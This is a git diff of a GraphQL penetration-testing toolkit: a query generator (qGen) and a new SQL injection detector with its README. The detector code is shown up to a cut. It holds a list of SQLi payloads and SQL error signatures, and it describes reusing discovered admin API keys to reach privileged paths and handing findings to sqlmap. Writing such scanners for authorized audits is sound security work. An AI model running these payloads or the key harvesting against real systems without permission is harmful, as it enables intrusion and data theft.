 
 ```shell
-# ------Listing methods and selecting one------
+# ------ Listing methods and selecting one ------
 qGen $ listMethods
 
 [redacted]
@@ -42,25 +55,26 @@ qGen $ listMethods
  [3] findAllConfigFiles
 
 qGen $ use 1
-qGen $ genQuery
+# Selecting a method with `use` immediately generates and prints the full query,
+# and the query is automatically saved to queries/<method>.txt
 ```
 
-### Option 2
+### Option 2 — Select by name
 
-- Directly use one method you know by name:
+Directly select a method by its name:
 
 ```shell
-# ------Directly select one method------
+# ------ Directly select one method ------
 qGen $ use findAllConfigFiles
-qGen $ genQuery
+# The query is generated and saved automatically
 ```
 
-### Option 3
+### Option 3 — Filtered listing with grep
 
-- Search for specific methods according to a grep pipe:
+You can pipe the output of `listMethods` through a simple grep filter:
 
 ```shell
-# ------Search for alike methods------
+# ------ Search for similar methods ------
 qGen $ listMethods | grep Id
 
 [redacted]
@@ -69,7 +83,7 @@ qGen $ listMethods | grep Id
 
 [89] findAllConfigFilesByContractId
 
 qGen $ use 89
-qGen $ genQuery
+# The full query for method 89 is generated and saved
 ```
 
 ## Available commands
 
@@ -79,10 +93,40 @@ qGen $ genQuery
 ```shell
 help - Show the help message
 listMethods - List all available GraphQL methods
-use <method> - Select a method
-genQuery - Generate a full GraphQL query with all fields
+use <index|name> - Select a method and immediately generate & save its full query
 exit - Exit the application
 ```
 
+Notes about behavior and output
+- The `use` command now combines selection and query generation: when you `use` a method, qGen prints the complete GraphQL query (including nested selections) and saves it into `queries/<method>.txt`.
+- Saved queries are stored in the `queries/` directory (created automatically if missing).
+- A typical generated query will include all scalar fields and descend into nested object fields where possible (respecting cycles by avoiding repeated types).
+
+Example interactive output (sample)
+```text
+qGen $ use getAllUsers
+
+----------------------------------------
+query getAllUsers {
+  getAllUsers {
+    id
+    username
+    email
+    profile {
+      id
+      name
+    }
+  }
+}
+----------------------------------------
+
+📁 Query saved to: queries/getAllUsers.txt
+```
-
+Troubleshooting
+- If automatic introspection fails, check:
+  - That the `--url` is correct and reachable.
+  - Authentication headers or cookie are correct (`-H "Authorization: Bearer ..."` or `--cookie /path/to/cookie.txt`).
+  - That the server responds to GraphQL introspection and returns JSON containing `__schema`.
+- If you prefer to avoid network fetching, run the introspection query separately (using curl, GraphiQL, or another client), save the JSON, and pass it with `--introspection`.
+- If a generated query is too large for your client, consider manually trimming fields or selecting nested fields selectively.
diff --git a/qGen/qGen.py b/qGen/qGen.py
index 42266e5..bd234d0 100644
--- a/qGen/qGen.py
+++ b/qGen/qGen.py
@@ -1,8 +1,17 @@
+#!/usr/bin/env python3
 import json
 import os
 import sys
 import argparse
-
+import textwrap
+from typing import Dict, Any, List, Optional
+
+# Try to import requests; if missing, we'll show a helpful message when needed
+try:
+    import requests
+except Exception:
+    requests = None
+
 # ANSI COLORS
 RED = "\033[31m"
 GREY = "\033[90m"
@@ -10,7 +19,7 @@
 YELLOW = "\033[33m"
 CYAN = "\033[36m"
 RESET = "\033[0m"
-
+
 def print_banner():
     print(f"""
 {YELLOW}
@@ -21,19 +30,19 @@ def print_banner():
 ╚██████╔╝╚██████╔╝███████╗██║  ╚████║
  ╚══▀▀═╝  ╚═════╝ ╚══════╝╚═╝   ╚═══╝ v1.0
 {RESET}
-
+
 {CYAN}made by gitblanc — https://github.com/gitblanc/QGen{RESET}
-
+
 """)
-
+
 def load_introspection():
     while True:
         path = input("Enter introspection JSON file path: ").strip()
-
+
         if not os.path.exists(path):
            print("❌ File not found. Try again.\n")
            continue
-
+
        try:
            with open(path, "r", encoding="utf-8") as f:
                data = json.load(f)
@@ -41,145 +50,375 @@ def load_introspection():
            return data
        except Exception as e:
            print(f"❌ Error reading JSON: {e}\n")
-
-
-# Extract query fields
+
+# Introspection query used when obtaining schema from endpoint.
+# NOTE: includes inputFields for input objects so we can expand them inline.
+INTROSPECTION_QUERY = """
+query IntrospectionQuery {
+  __schema {
+    queryType { name }
+    mutationType { name }
+    types {
+      kind
+      name
+      fields(includeDeprecated: true) {
+        name
+        args {
+          name
+          type { kind name ofType { kind name ofType { kind name } } }
+        }
+        type { kind name ofType { kind name } }
+      }
+      inputFields {
+        name
+        description
+        defaultValue
+        type { kind name ofType { kind name ofType { kind name } } }
+      }
+      enumValues {
+        name
+      }
+    }
+  }
+}
+"""
+
+def parse_header_list(headers_list: List[str]) -> Dict[str, str]:
+    """
+    Convert list of 'Name: Value' strings to a dict (last wins for duplicates).
+ """ + hdrs: Dict[str, str] = {} + for h in headers_list or []: + if ":" not in h: + print(f"⚠️ Ignoring malformed header (expected 'Name: Value'): {h}") + continue + name, value = h.split(":", 1) + hdrs[name.strip()] = value.strip() + return hdrs + +def perform_introspection_request(url: str, headers: Dict[str, str], timeout: int = 15) -> Optional[Dict[str, Any]]: + """ + Perform a POST request to the GraphQL endpoint with the introspection query. + Returns parsed JSON on success, or None on failure. + """ + if requests is None: + print("❌ The 'requests' library is required for automatic introspection. Install with: pip install requests") + return None + + try: + resp = requests.post(url, headers=headers, json={"query": INTROSPECTION_QUERY}, timeout=timeout) + except requests.exceptions.RequestException as e: + print(f"❌ HTTP error while requesting introspection: {e}") + return None + + try: + data = resp.json() + except Exception as e: + print(f"❌ Response is not valid JSON: {e}") + return None + + if (isinstance(data, dict) and + ((data.get("data") and isinstance(data["data"], dict) and "__schema" in data["data"]) or ("__schema" in data))): + return data + + print("❌ Introspection response does not contain '__schema' (not a valid GraphQL introspection).") + return None + +def save_introspection_file(data: Dict[str, Any], path: str = "introspection_schema.json") -> None: + try: + with open(path, "w", encoding="utf-8") as fh: + json.dump(data, fh, indent=2, ensure_ascii=False) + print(f"✅ Introspection saved to: {path}") + except Exception as e: + print(f"⚠️ Failed to save introspection to {path}: {e}") + +# Extract query and mutation fields def extract_graphql_queries(introspection): try: types = introspection["data"]["__schema"]["types"] except Exception: return [] - - query_type_name = introspection["data"]["__schema"]["queryType"]["name"] - query_type = next((t for t in types if t.get("name") == query_type_name), None) - - if not query_type: - return [] - - return query_type.get("fields", []) - - + + methods = [] + + # Extract query fields (if present) + query_type = introspection["data"]["__schema"].get("queryType") + query_type_name = query_type.get("name") if isinstance(query_type, dict) else query_type + if query_type_name: + qtype = next((t for t in types if t.get("name") == query_type_name), None) + if qtype and "fields" in qtype: + for f in qtype["fields"]: + f_copy = f.copy() + f_copy["_root"] = "query" + methods.append(f_copy) + + # Extract mutation fields (if present) + mutation_type = introspection["data"]["__schema"].get("mutationType") + mutation_type_name = mutation_type.get("name") if isinstance(mutation_type, dict) else mutation_type + if mutation_type_name: + mtype = next((t for t in types if t.get("name") == mutation_type_name), None) + if mtype and "fields" in mtype: + for f in mtype["fields"]: + f_copy = f.copy() + f_copy["_root"] = "mutation" + methods.append(f_copy) + + return methods + + # Follow NON_NULL / LIST / etc. 
def resolve_type(t): - while t.get("ofType") is not None: + # t is expected to be a dict with possible 'ofType' recursing + while isinstance(t, dict) and t.get("ofType") is not None: t = t["ofType"] return t - - -# Recursively build full field tree for the query + +# Recursively build full field tree for the query (response shape) def build_field_tree(field_type, types, depth=0, visited=None): if visited is None: visited = set() - + field_type = resolve_type(field_type) - - if field_type["name"] in visited: + + # Some types might not have a name (e.g., scalars) - guard + name = field_type.get("name") + if name and name in visited: return "" - - visited.add(field_type["name"]) - - if field_type["kind"] != "OBJECT": + + if name: + visited.add(name) + + if field_type.get("kind") != "OBJECT": return "" - + obj = next((t for t in types if t["name"] == field_type["name"]), None) if not obj or "fields" not in obj: return "" - + indent = " " * depth result = "" - + for f in obj["fields"]: f_type = resolve_type(f["type"]) f_name = f["name"] - - if f_type["kind"] == "OBJECT": + + if f_type.get("kind") == "OBJECT": sub = build_field_tree(f["type"], types, depth + 1, visited.copy()) result += f"{indent}{f_name} {{\n{sub}{indent}}}\n" else: result += f"{indent}{f_name}\n" - + return result - + def save_query_to_file(method_name, query_text): # Ensure directory exists os.makedirs("queries", exist_ok=True) - + path = f"queries/{method_name}.txt" - + try: with open(path, "w", encoding="utf-8") as f: f.write(query_text) print(f"📁 Query saved to: {path}\n") except Exception as e: print(f"❌ Error saving query: {e}") - - + def stringify_type(t): """Convert GraphQL type tree into a printable type string.""" - if t["kind"] == "NON_NULL": + if not isinstance(t, dict): + return "Unknown" + if t.get("kind") == "NON_NULL": return f"{stringify_type(t['ofType'])}!" 
- elif t["kind"] == "LIST": + elif t.get("kind") == "LIST": return f"[{stringify_type(t['ofType'])}]" else: - return t["name"] - + return t.get("name", "Unknown") + +# Helpers to build inline input objects with example values +def build_input_object(type_ref, types, depth=0, visited=None): + """ + Given a type reference (dict with kind/name/ofType), find the corresponding INPUT_OBJECT + type definition in 'types' and return a formatted inline object string like: + { username: "user", password: "pass" } + """ + if visited is None: + visited = set() + + resolved = resolve_type(type_ref) + type_name = resolved.get("name") + if not type_name: + return "{}" + + if type_name in visited: + return "{}" + visited.add(type_name) + + type_obj = next((t for t in types if t.get("name") == type_name), None) + if not type_obj: + return "{}" + + input_fields = type_obj.get("inputFields") or [] + indent = " " * depth + inner_indent = " " * (depth + 1) + + parts = [] + for f in input_fields: + fname = f["name"] + # If defaultValue is provided in introspection, use it + if f.get("defaultValue") is not None: + val = f["defaultValue"] + # defaultValue in introspection is a string representation; leave as-is + parts.append(f"{inner_indent}{fname}: {val}") + continue + + val = format_input_value(f["type"], types, fname, depth + 1, visited.copy()) + parts.append(f"{inner_indent}{fname}: {val}") + + if not parts: + return "{}" + + if depth == 0: + # single-line compact for top-level input + inner = ", ".join(p.strip() for p in parts) + return "{ " + inner + " }" + else: + # multi-line with indentation + body = "\n".join(parts) + return "{\n" + body + f"\n{indent}}}" + +def format_input_value(type_ref, types, field_name=None, depth=0, visited=None): + """ + Return a string representing a sample value for the given type reference. + Strings are quoted, booleans and numbers are unquoted, lists are bracketed, objects expanded. 
+ """ + t = type_ref + # Handle NON_NULL / LIST wrappers + if not isinstance(t, dict): + return "\"example\"" + + if t.get("kind") == "NON_NULL": + return format_input_value(t["ofType"], types, field_name, depth, visited) + if t.get("kind") == "LIST": + # produce a single-element list + inner = format_input_value(t["ofType"], types, field_name, depth + 1, visited) + return f"[{inner}]" + + # Now resolved scalar/enum/input object/type + kind = t.get("kind") + name = t.get("name", "") + + # Primitive scalars + if kind == "SCALAR" or name in ("String", "ID", ""): + # sensible defaults by common field name + if field_name: + lname = field_name.lower() + if "user" in lname and "name" in lname: + return f"\"{field_name}_example\"" + if "name" == lname: + return f"\"{field_name}_example\"" + if "pass" in lname: + return "\"password123\"" + if "email" in lname: + return f"\"{field_name}@example.com\"" + if "msg" in lname or "message" in lname: + return f"\"{field_name}_example\"" + if "role" in lname: + return "\"user\"" + # default string + return "\"example\"" + if name in ("Int", "Float"): + return "0" + if name == "Boolean": + return "false" + + # Enums: try to pick first enum value if present + if kind == "ENUM" or (name and any(ti.get("name") == name and ti.get("enumValues") for ti in types)): + t_obj = next((ti for ti in types if ti.get("name") == name), None) + if t_obj: + enum_vals = t_obj.get("enumValues") or [] + if enum_vals: + first = enum_vals[0].get("name") + # enums are unquoted or sometimes unquoted values -> return first as bare token + return first if first is not None else "\"ENUM_VALUE\"" + return "\"ENUM_VALUE\"" + + # Input objects -> expand recursively + if kind == "INPUT_OBJECT" or (name and any(ti.get("name") == name and ti.get("inputFields") for ti in types)): + return build_input_object(t, types, depth, visited) + + # Fallback to string + return "\"example\"" + def generate_full_query(method_field, introspection): types = introspection["data"]["__schema"]["types"] - + # ---- Extract arguments ---- - args = method_field.get("args", []) + args = method_field.get("args", []) or [] variables = [] call_args = [] - + + # Decide per-arg whether to inline (INPUT_OBJECT) or use variable for a in args: var_name = a["name"] - var_type = stringify_type(a["type"]) - variables.append(f"${var_name}: {var_type}") - call_args.append(f"{var_name}: ${var_name}") - + resolved = resolve_type(a["type"]) + kind = resolved.get("kind") + name = resolved.get("name") + + if kind == "INPUT_OBJECT" or (name and any(t.get("name") == name and t.get("inputFields") for t in types)): + # inline expanded object + inline_obj = build_input_object(a["type"], types) + call_args.append(f"{var_name}: {inline_obj}") + else: + # keep as variable + var_type = stringify_type(a["type"]) + variables.append(f"${var_name}: {var_type}") + call_args.append(f"{var_name}: ${var_name}") + # Build signature variables_str = f"({', '.join(variables)})" if variables else "" call_args_str = f"({', '.join(call_args)})" if call_args else "" - + # ---- Build field tree ---- root_type = method_field["type"] fields_tree = build_field_tree(root_type, types, depth=2) - + + # Determine operation type (query or mutation) + operation = method_field.get("_root", "query") + # ---- Build final query ---- return f""" -query {method_field['name']}{variables_str} {{ +{operation} {method_field['name']}{variables_str} {{ {method_field['name']}{call_args_str} {{ {fields_tree} }} }} """.rstrip() - - + + def print_help(): print(""" Available 
commands:
        help - Show this help message
        listMethods - List all available GraphQL methods
-        use <method> - Select a method
-        genQuery - Generate a full GraphQL query with all fields
+        use <index|name> - Select a method and immediately generate its full query
        exit - Exit the application
    """)
-
-
+
+
 def interactive_console(methods, introspection):
     selected_method = None
-
+
     print("Type 'help' to see available commands.\n")
-
+
     while True:
         raw_cmd = input(f"{RED}Qgen ${RESET} ").strip()
-
+
         # --- PIPE SUPPORT ---
         if "|" in raw_cmd:
             left, _, right = raw_cmd.partition("|")
             cmd = left.strip()
             pipe_cmd = right.strip()
-
+
             if pipe_cmd.startswith("grep"):
                 _, _, grep_text = pipe_cmd.partition("grep")
                 grep_text = grep_text.strip().lower()
@@ -190,14 +429,22 @@ def interactive_console(methods, introspection):
             cmd = raw_cmd
             pipe_cmd = None
         # ---------------------
-
+
+        # Allow shorthand: bare number or exact method name selects the method
+        # but don't override primary commands
+        if not cmd.startswith("use ") and cmd not in ("help", "listMethods", "exit", ""):
+            if cmd.isdigit():
+                cmd = f"use {cmd}"
+            else:
+                if any(m["name"] == cmd for m in methods):
+                    cmd = f"use {cmd}"
+
         # MAIN COMMAND HANDLING
         if cmd == "help":
             output = """Available commands:
        help - Show this help message
        listMethods - List all available GraphQL methods
-        use <method> - Select a method
-        genQuery - Generate a full GraphQL query with all fields
+        use <index|name> - Select a method and immediately generate its full query
        exit - Exit the application
    """
             if pipe_cmd:
@@ -205,22 +452,26 @@ def interactive_console(methods, introspection):
                     line for line in output.splitlines() if grep_text in line.lower()
                 )
             print(output)
-
+
         elif cmd == "listMethods":
-            lines = [f" [{i}] {m['name']}" for i, m in enumerate(methods, start=1)]
-
+            lines = []
+            for i, m in enumerate(methods, start=1):
+                root = m.get("_root", "query")
+                prefix = "Q" if root == "query" else "M"
+                lines.append(f" [{i}] ({prefix}) {m['name']}")
+
             if pipe_cmd:
                 lines = [l for l in lines if grep_text in l.lower()]
-
+
             print("\n📌 Available methods:")
             for line in lines:
                 print(line)
             print()
-
+
         elif cmd.startswith("use "):
             _, _, value = cmd.partition(" ")
             value = value.strip()
-
+
             if value.isdigit():
                 idx = int(value) - 1
                 if 0 <= idx < len(methods):
@@ -228,6 +479,7 @@ def interactive_console(methods, introspection):
                     print(f"✔ Selected method: {selected_method['name']}\n")
                 else:
                     print("❌ Invalid method number.\n")
+                    continue
             else:
                 match = next((m for m in methods if m["name"] == value), None)
                 if match:
@@ -235,41 +487,61 @@ def interactive_console(methods, introspection):
                     print(f"✔ Selected method: {value}\n")
                 else:
                     print("❌ Method not found.\n")
-
-        elif cmd == "genQuery":
-            if not selected_method:
-                print("❌ Select a method first with: use <method>\n")
-            else:
+                    continue
+
+            # Unified behavior: immediately generate the full query for the selected method
+            try:
                 query = generate_full_query(selected_method, introspection)
                 print("\n----------------------------------------")
                 print(f"{BLUE}{query}{RESET}")
                 print("----------------------------------------\n")
-
+
                 # Save the query automatically
                 save_query_to_file(selected_method["name"], query)
-
+            except Exception as e:
+                print(f"❌ Error generating query: {e}\n")
+
         elif cmd == "exit":
             print("👋 Exiting...")
             break
-
+
         else:
+            if cmd == "":
+                # ignore empty input
+                continue
            print("❌ Unknown command. 
Type 'help' for the command list.\n") - - + + def main(): print_banner() print("=== GraphQL Interactive CLI (extruder) ===\n") - + parser = argparse.ArgumentParser(description="GraphQL Introspection CLI Extruder") parser.add_argument( "--introspection", type=str, help="Path to introspection JSON file" ) - + # New: endpoint URL to query introspection if --introspection is omitted + parser.add_argument( + "--url", + type=str, + help="GraphQL endpoint URL to perform introspection automatically if --introspection is not provided" + ) + # Support repeated headers -H "Name: Value" + parser.add_argument("-H", "--header", action="append", default=[], help="Additional HTTP header to include when performing automatic introspection. Format: 'Name: Value'") + # Cookie file support (for automatic introspection) + parser.add_argument("--cookie", help="File containing cookie in plain text (one line) to use when performing automatic introspection") + # Saving option for automatic introspection + parser.add_argument("--save-introspection", dest="save_introspection", action="store_true", help="Save automatic introspection to introspection_schema.json") + parser.add_argument("--no-save-introspection", dest="save_introspection", action="store_false", help="Do not save automatic introspection to disk") + parser.set_defaults(save_introspection=True) + args = parser.parse_args() - - # If provided via CLI, try to load it directly + + introspection = None + + # If provided via CLI file, try to load it directly if args.introspection: if os.path.exists(args.introspection): try: @@ -283,17 +555,44 @@ def main(): print("❌ File path passed to --introspection does not exist.\n") return else: - # Fall back to interactive prompt - introspection = load_introspection() - + # Attempt to perform automatic introspection if --url provided + if args.url: + # Build headers: Content-Type + user provided headers + cookie (if provided) + headers = {"Content-Type": "application/json"} + extra_headers = parse_header_list(args.header) + if args.cookie: + if not os.path.exists(args.cookie): + print(f"❌ Cookie file not found: {args.cookie}\n") + return + with open(args.cookie, "r", encoding="utf-8") as f: + cookie_value = f.read().strip() + # Respect explicit Cookie header if user provided it via -H + if "Cookie" not in extra_headers: + extra_headers["Cookie"] = cookie_value + headers.update(extra_headers) + + print(f"[*] No --introspection provided; performing introspection query against {args.url} ...") + result = perform_introspection_request(args.url, headers) + if result is None: + print("❌ Could not obtain introspection from endpoint. Falling back to interactive prompt.\n") + introspection = load_introspection() + else: + introspection = result + print("✅ Introspection obtained from endpoint.\n") + if args.save_introspection: + save_introspection_file(introspection, path="introspection_schema.json") + else: + # Fall back to interactive prompt if no --url supplied + introspection = load_introspection() + methods = extract_graphql_queries(introspection) - + if not methods: print("❌ No GraphQL methods found in the introspection.") return - + interactive_console(methods, introspection) - - + + if __name__ == "__main__": main() diff --git a/sqli/README.md b/sqli/README.md new file mode 100644 index 0000000..ef304b9 --- /dev/null +++ b/sqli/README.md @@ -0,0 +1,146 @@ +# GraphQL SQLi Detector (sqli_detector.py) + +A compact GraphQL SQL injection mini-detector (Python). 
This script performs GraphQL introspection, attempts a set of SQLi-like payloads against candidate string arguments, and writes reproducible marker `.http` files for use with sqlmap. The detector includes heuristics to reduce false positives and attempts to populate required arguments using values extracted from simple queries or an optional limited crawler. It also prioritizes discovered admin API keys when filling key-like arguments to increase coverage of privileged code paths.
+
+---
+
+## Key capabilities
+- Performs GraphQL introspection to discover `Query` fields and their arguments.
+- Extracts real values from simple queries (tokens, keys, names) to use as baselines or to fill required arguments.
+- Opt-in crawling to follow relationships and collect more candidate inputs (Relay-style pagination attempts included).
+- Decodes common GraphQL global IDs encoded as base64 and adds decoded IDs as candidates.
+- Tests string-like arguments with a curated set of SQLi payloads.
+- Detects SQL error messages included in GraphQL `errors`.
+- Detects response differences (baseline vs attack), `NULL`-on-attack, and other signals.
+- Writes reproducible `.http` marker files in `repro-payloads/` where the vulnerable value is replaced by `*`.
+- Produces a recommended sqlmap command for confirmed findings.
+- Prioritizes API keys discovered with role `admin` when filling key-like arguments (e.g. `apiKey`, `key`, `token`), increasing the chance to reach privileged code paths.
+- Uses confirmation rules to reduce false positives (reports only when evidence is strong).
+
+---
+
+## What the detector does (high-level)
+1. Runs GraphQL introspection to obtain types and `Query` fields.
+2. Extracts values from simple, argument-less queries (seed phase) and, optionally, runs a limited BFS-style crawl:
+   - For seed fields it tries several query shapes (simple selection, Relay `first:N` with `edges.node`, and `first:N` without edges) to coax items out of paginated endpoints.
+   - Decodes base64/global IDs and adds decoded IDs (and `Id` keys) to candidate pools.
+   - Follows id-like args using extracted IDs to expand discovery.
+3. For each field with string-like arguments:
+   - Builds a working baseline by trying a few combinations of plausible values for other args.
+   - Sends curated SQLi-like payloads in the target argument.
+   - Skips GraphQL syntax errors (not SQLi).
+   - Detects SQL error messages, response diffs, and null-on-attack.
+   - If a required argument is missing, attempts to fill it from extracted values (with a simple name-match fallback).
+4. For confirmed signals, writes a `.http` marker file with the attack request (attacked value replaced by `*`) and suggests a sqlmap command.
+
+---
+
+## Usage
+Basic usage:
+```bash
+python sqli_detector.py <endpoint> [headers_json]
+```
+
+Examples:
+- Quick run without crawling:
+  ```bash
+  python sqli_detector.py https://example.com/graphql
+  ```
+- Run with authorization header (no crawl):
+  ```bash
+  python sqli_detector.py https://example.com/graphql '{"Authorization":"Bearer TOKEN"}'
+  ```
+- Run with crawling (authorized audits only):
+  ```bash
+  python sqli_detector.py https://example.com/graphql '{"Authorization":"Bearer TOKEN"}' --crawl --crawl-depth 2 --max-requests 200 --max-items 10 --crawl-delay 0.1 --verbose
+  ```
+
+---
+
+## CLI flags (summary)
+- `<endpoint>` (positional)
+  GraphQL endpoint URL.
+
+- `[headers_json]` (positional, optional)
+  JSON string or simple "Key: Value" pairs (e.g. `'{"Authorization":"Bearer TOKEN"}'`).
+
+- `--crawl`
+  Enable limited crawling to extract outputs and reuse them as inputs. Opt-in because deeper crawling increases the number of requests (a lighter seed pass runs even without this flag).
+
+- `--crawl-depth N` (default: 2)
+  Maximum crawl depth (BFS levels).
+
+- `--max-requests N` (default: 250)
+  Maximum number of requests allowed during crawling.
+
+- `--max-items N` (default: 10)
+  Max items per list to inspect when extracting values.
+
+- `--crawl-delay FLOAT` (default: 0.0)
+  Delay in seconds between requests during crawling.
+
+- `--verbose`
+  Print queries and additional debug information (useful to inspect what the crawler is calling and the responses).
+
+---
+
+## Output
+- Human-readable findings printed to stdout (colored if colorama is available).
+- Repro marker files written to `repro-payloads/` when findings are confirmed. Filenames include a sanitized field/arg name and a short hash to avoid collisions.
+- Each finding contains:
+  - field and argument name
+  - arguments used for the attack
+  - evidence (error message or description)
+  - marker request path
+  - recommended sqlmap command:
+    ```
+    sqlmap --level 5 --risk 3 -r '<marker_file.http>' -p "JSON[query]" --batch --skip-urlencode --random-agent
+    ```
+
+---
+
+## Marker (.http) files
+- Marker files are full HTTP POST requests that include headers and a JSON body where the vulnerable value has been replaced by `*`. Example:
+  ```
+  POST /graphql HTTP/1.1
+  Host: example.com
+  Content-Type: application/json
+  Authorization: Bearer TOKEN
+
+  {"query":"query { user(id: \"123\") { email } }"}
+  ```
+- The target value in the JSON is substituted with `*` so sqlmap can inject into `JSON[query]` using `-r <marker_file.http>` and `-p "JSON[query]"`.
+
+---
+
+## Detection heuristics / confirmation rules
+To reduce noisy false positives the detector reports a parameter only when one or more of the following hold:
+- A clear SQL error is present in GraphQL `errors` (matches DB error signatures), OR
+- Two or more distinct payloads produce evidence, OR
+- A combination of strong signals (e.g., RESPONSE_DIFF + NULL_ON_ATTACK), OR
+- A `NULL_ON_ATTACK` signal confirmed against a meaningful baseline.
+
+Signals checked:
+- SQL error messages in `errors` (MySQL/Postgres/SQLite mentions, syntax errors, etc.)
+- Response differences between baseline and attacked request
+- `null` appearing in the attack response while baseline returned data
+- Differences in a simple `__typename` baseline vs attack (quick sanity check)
+
+A minimal code sketch of this differential logic appears in the appendix at the end of this README.
+
+---
+
+## Limitations
+- Small, curated payload set, not exhaustive. Use sqlmap with the generated markers for deeper automated testing.
+- Tests are sequential; there is no built-in concurrency/worker pool. For large schemas consider extending to multiple workers.
+- Crawling can reveal or store sensitive data. Use crawling only on authorized targets and treat `repro-payloads/` as sensitive output.
+- Time-based blind SQLi is not tested by default. Add time-based payloads and response timing checks to detect blind techniques.
+- If GraphQL introspection is disabled, discovery will fail; provide the schema manually or use alternative enumeration techniques.
+- Complex input objects, deeply nested relationships, or custom auth flows may need custom logic to populate arguments successfully.
+
+---
+
+## Suggested next improvements
+- Add flags for:
+  - concurrency / workers
+  - custom payload lists and strategies
+- Expand payloads to include boolean- and time-based techniques (blind SQLi).
+- Add more robust heuristics (email/UUID/hash detection, fuzzy matches).
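+
+---
+
+## Appendix: the differential check (sketch)
+The confirmation rules above reduce to comparing a clean baseline response with an attacked one and scanning GraphQL `errors` for database error signatures. The snippet below is a minimal, self-contained sketch of that idea, simplified from the detector's internals; `baseline` and `attack` stand for already-parsed GraphQL response bodies, and the signature list is abbreviated:
+
+```python
+import json
+import re
+from typing import Optional
+
+# Abbreviated version of the detector's SQL error signatures.
+SQL_ERROR = re.compile(r"SQL syntax|syntax error|sqlstate|unterminated quoted string", re.I)
+
+def normalize(resp: dict) -> str:
+    # Canonical JSON makes two responses comparable regardless of key order.
+    return json.dumps(resp, sort_keys=True, ensure_ascii=False)
+
+def differential_check(baseline: dict, attack: dict) -> Optional[str]:
+    # Strongest signal: a database error surfaced through GraphQL `errors`.
+    for err in attack.get("errors", []):
+        if SQL_ERROR.search(str(err.get("message", ""))):
+            return "SQL_ERROR"
+    # Weaker signal: the attack changes a previously clean response.
+    if not baseline.get("errors") and normalize(baseline) != normalize(attack):
+        return "RESPONSE_DIFF"
+    return None
+
+# Example: baseline returned data; the attack leaked a DB error.
+base = {"data": {"user": {"id": "1"}}}
+atk = {"errors": [{"message": "You have an error in your SQL syntax"}]}
+assert differential_check(base, atk) == "SQL_ERROR"
+```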
diff --git a/sqli/requirements.txt b/sqli/requirements.txt new file mode 100644 index 0000000..0cf5745 --- /dev/null +++ b/sqli/requirements.txt @@ -0,0 +1,2 @@ +requests>=2.28.0 +colorama>=0.4.0 diff --git a/sqli/sqli_detector.py b/sqli/sqli_detector.py new file mode 100644 index 0000000..b92accc --- /dev/null +++ b/sqli/sqli_detector.py @@ -0,0 +1,1160 @@ +#!/usr/bin/env python3 +from __future__ import annotations +import re +import json +import base64 +import hashlib +import argparse +import time +import shutil +from datetime import datetime, timezone +from typing import Any, Dict, List, Optional, Set, Tuple +from urllib.parse import urlparse +from pathlib import Path +from itertools import product + +import requests +try: + from colorama import init as colorama_init, Fore, Style + colorama_init(autoreset=True) +except Exception: + class _Dummy: + def __getattr__(self, name): return "" + Fore = Style = _Dummy() + +INTROSPECTION_QUERY = """ +query IntrospectionQuery { + __schema { + types { + kind + name + fields { + name + args { + name + type { + kind + name + ofType { + kind + name + ofType { + kind + name + } + } + } + } + type { + kind + name + ofType { + kind + name + ofType { + kind + name + } + } + } + } + } + } +} +""" + +PAYLOADS = [ + '" OR "1"="1', + "' OR '1'='1", + "' OR 1=1--", + "admin' -- ", + "x' UNION SELECT NULL-- ", + '"\' OR 1=1 -- ', + "'", + "admin'/*", + 'admin"/*', +] + +SQL_ERROR_SIGS = [ + re.compile(r"SQL syntax", re.I), + re.compile(r"syntax error", re.I), + re.compile(r"unterminated quoted string", re.I), + re.compile(r"mysql", re.I), + re.compile(r"postgres", re.I), + re.compile(r"sqlite", re.I), + re.compile(r"sqlstate", re.I), + re.compile(r"you have an error in your sql syntax", re.I), + re.compile(r"pg_query\(", re.I), + re.compile(r"pymysql", re.I), + re.compile(r"psycopg", re.I), + re.compile(r"mariadb", re.I), +] + +TIMEOUT = 20 +REPRO_DIR = "repro-payloads" +INDEX_FILE = "index.json" +EVIDENCE_MAX_CHARS = 80 # max chars to display for evidence in console + +# -------------------- Utilities ------------------------------------------- + +def try_parse_headers(h: Optional[str]) -> Dict[str, str]: + if not h: + return {} + try: + parsed = json.loads(h) + if isinstance(parsed, dict): + return parsed + if isinstance(parsed, list): + res = {} + for item in parsed: + if isinstance(item, dict): + res.update(item) + return res + except Exception: + pass + headers = {} + for part in re.split(r";|,", h): + part = part.strip() + if not part: + continue + if ":" in part: + k, v = part.split(":", 1) + headers[k.strip()] = v.strip() + return headers + +def post_graphql(endpoint: str, headers: Dict[str, str], payload: Dict[str, Any], verbose: bool = False) -> Dict[str, Any]: + h = {"Content-Type": "application/json"} + h.update(headers or {}) + if verbose: + q = payload.get("query") if isinstance(payload, dict) else str(payload) + print(Fore.BLUE + Style.DIM + "[>] POST " + endpoint + " BODY: " + Style.RESET_ALL + (q[:800] + "..." 
if len(q) > 800 else q)) + try: + r = requests.post(endpoint, json=payload, headers=h, timeout=TIMEOUT) + try: + data = r.json() + except Exception: + data = {"_raw_text": r.text} + return {"status": r.status_code, "data": data} + except requests.RequestException as e: + return {"status": 0, "data": {"errors": [{"message": str(e)}]}} + +def extract_named_type(t: Optional[Dict[str, Any]]) -> Optional[str]: + if not t: + return None + if t.get("name"): + return t.get("name") + if t.get("ofType"): + return extract_named_type(t.get("ofType")) + return None + +def is_string_type(arg_type_name: Optional[str]) -> bool: + if not arg_type_name: + return False + n = arg_type_name.lower() + return n in ("string", "id", "varchar", "text") + +def find_type_definition(schema_types: List[Dict[str, Any]], name: Optional[str]) -> Optional[Dict[str, Any]]: + if not name: + return None + for t in schema_types: + if t.get("name") == name: + return t + return None + +def pick_scalar_field_for_type(type_def: Optional[Dict[str, Any]], schema_types: List[Dict[str, Any]]) -> Optional[str]: + if not type_def or not type_def.get("fields"): + return None + for f in type_def.get("fields", []): + tname = extract_named_type(f.get("type")) + if not tname: + continue + low = tname.lower() + if low in ("string", "int", "float", "boolean", "id", "integer"): + return f.get("name") + td = find_type_definition(schema_types, tname) + if not td or not td.get("fields"): + return f.get("name") + return None + +def normalize_resp(data: Any) -> str: + try: + return json.dumps(data, sort_keys=True, ensure_ascii=False) + except Exception: + return str(data) + +def truncate_str(s: str, n: int = 180) -> str: + if s is None: + return "" + s = str(s) + return s if len(s) <= n else s[:n] + "..." + +def build_query(field_name: str, args_dict: Dict[str, str], selection: Optional[str]) -> Dict[str, Any]: + if args_dict: + args_str = ", ".join([f'{k}: {json.dumps(v)}' for k, v in args_dict.items()]) + if selection: + q = f'query {{ {field_name}({args_str}) {{ {selection} }} }}' + else: + q = f'query {{ {field_name}({args_str}) }}' + else: + if selection: + q = f'query {{ {field_name} 